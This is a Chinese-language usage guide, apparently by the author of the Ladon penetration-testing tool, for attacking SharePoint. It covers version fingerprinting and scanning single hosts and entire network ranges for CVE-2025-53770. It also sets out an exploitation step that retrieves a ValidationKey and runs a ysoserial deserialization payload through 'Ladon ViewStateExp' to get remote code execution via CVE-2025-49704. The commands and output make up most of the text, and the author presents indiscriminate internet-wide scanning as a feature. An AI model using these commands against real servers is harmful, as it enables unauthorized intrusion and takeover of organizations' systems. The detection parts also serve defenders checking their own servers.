CMS识别 SharePoint
CMS、WhatCMS、CmsInfo等,Cobalt Strike下用法一致,输入URL,仅识别URL对应指纹,输入非URL时,会探测常见cve-2025-53770网站、网络设备、打印机、路由器、防火墙、VPN等
1
| Ladon http://k8gege.org CMS
|
SharePoint 版本探测
1
| Ladon http://k8gege.org SharePointVer
|
结果如下
1
2
3
4
| Load SharePointVer
http://k8gege.org SharePoint: 16.0.0.5513 NET: 4.0.30319
IP Finished!
End: 2025-07-28 08:09:39
|
![使用http访问查看图片]()
SharePoint CVE-2025-53770后门检测
根据公开资料,对SharePoint服务器进行扫描,还是能检到一此webshell
![使用http访问查看图片]()
访问 可获取 ValidationKey
![使用http访问查看图片]()
CVE-2025-49704漏洞getshell
ysoserial 生成反序列化payload 使用Ladon ViewStateExp执行RCE
![使用http访问查看图片]()
1
| Ladon ViewStateExp http://k8gege.org/_layouts/15/default.aspx payload.txt
|
CVE-2025-53770 漏洞检测
指定URL
1
| Ladon http://k8gege.org cve-2025-53770
|
![使用http访问查看图片]()
指定IP
1
| Ladon k8gege.org cve-2025-53770
|
批量URL
1
| Ladon url.txt cve-2025-53770
|
PS:TXT可存放IP、IP:Port、URL等格式
批量IP
1
| Ladon ip.txt cve-2025-53770
|
指定C段
1
2
3
4
5
| Ladon k8gege.org/24 cve-2025-53770
Ladon noping k8gege.org/24 cve-2025-53770
Ladon k8gege.org/24 cve-2025-53770
Ladon noping k8gege.org/24 cve-2025-53770
|
指定B段
1
2
3
4
5
| Ladon k8gege.org/b cve-2025-53770
Ladon noping k8gege.org/b cve-2025-53770
Ladon k8gege.org/b cve-2025-53770
Ladon noping k8gege.org/b cve-2025-53770
|
指定A段
1
2
3
4
5
| Ladon k8gege.org/a cve-2025-53770
Ladon noping k8gege.org/a cve-2025-53770
Ladon k8gege.org/a cve-2025-53770
Ladon noping k8gege.org/a cve-2025-53770
|
批量C段
1
2
3
4
5
| Ladon ip24.txt cve-2025-53770
Ladon ipc.txt cve-2025-53770
Ladon noping ip24.txt cve-2025-53770
Ladon noping ipc.txt cve-2025-53770
|
PS: TXT存放多个目标的C段IP
批量B段
1
2
| Ladon ip16.txt cve-2025-53770
Ladon noping ip16.txt cve-2025-53770
|
PS: TXT存放多个目标的B段IP
批量网段
1
2
| Ladon cidr.txt cve-2025-53770
Ladon noping cidr.txt cve-2025-53770
|
PS: TXT存放各种IP网段,全网无差别扫描
更多功能 使用教程
https://k8gege.org/Ladon/
转载声明
K8博客文章随意转载,转载请注明出处! © K8gege http://k8gege.org
